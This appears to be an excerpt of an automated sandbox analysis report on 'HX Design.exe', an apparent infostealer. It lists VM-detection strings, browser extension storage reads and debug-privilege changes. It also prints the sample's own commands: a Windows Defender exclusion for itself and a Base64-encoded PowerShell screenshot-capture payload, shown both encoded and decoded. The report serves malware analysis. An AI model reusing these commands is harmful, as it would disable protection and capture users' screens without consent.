              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-util-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer\md__mypyc.cp313-win_amd64.pydJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-file-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-console-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\HX Design.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17307
              Source: C:\Users\user\Desktop\HX Design.exeAPI coverage: 5.5 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep count: 7922 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8032Thread sleep time: -8301034833169293s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep count: 1458 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940Thread sleep count: 7637 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944Thread sleep count: 1838 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8028Thread sleep time: -11990383647911201s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8116Thread sleep count: 4249 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768Thread sleep time: -12912720851596678s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080Thread sleep count: 2572 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6592Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 8012Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1852Thread sleep count: 2751 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7420Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep count: 1091 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7596Thread sleep count: 3442 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2260Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 908Thread sleep count: 294 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF7320683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF7320683C0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF732069280 FindFirstFileExW,FindClose,0_2_00007FF732069280
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF732081874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF732081874
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF732069280 FindFirstFileExW,FindClose,1_2_00007FF732069280
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF7320683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF7320683C0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF732081874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF732081874
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D2146EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,73_2_00007FF77D2146EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D2588E0 FindFirstFileExA,73_2_00007FF77D2588E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D20E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,73_2_00007FF77D20E21C
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB2F1230 GetSystemInfo,1_2_00007FFDFB2F1230
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\Jump to behavior
              Source: HX Design.exe, 00000000.00000003.1674037993.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003C.00000002.2920347865.00000298F222B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003C.00000002.2922517117.00000298F785A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fecodevmusrvc
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: `8Of1vmware
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: d8qemu-ga
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f4vmsrvc
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: msedge.exe, 0000003B.00000002.1917958412.00000143C522B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: chrome.exe, 0000003A.00000002.1917350022.000001C518098000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllqq
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF73206D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF73206D12C
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFAD90350 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFDFAD90350
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF732083480 GetProcessHeap,0_2_00007FF732083480
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF73206D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF73206D12C
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF73206D30C SetUnhandledExceptionFilter,0_2_00007FF73206D30C
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF73206C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF73206C8A0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF73207A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF73207A614
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF73206D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF73206D12C
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF73206D30C SetUnhandledExceptionFilter,1_2_00007FF73206D30C
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF73206C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF73206C8A0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF73207A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF73207A614
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFACE3248 IsProcessorFeaturePresent,00007FFE1A461A90,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE1A461A90,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFACE3248
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFE0031212B IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE0031212B
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFE00311CB7 SetUnhandledExceptionFilter,1_2_00007FFE00311CB7
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D254C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,73_2_00007FF77D254C10
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D24A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,73_2_00007FF77D24A66C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D24B6D8 SetUnhandledExceptionFilter,73_2_00007FF77D24B6D8
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D24B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,73_2_00007FF77D24B52C

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") 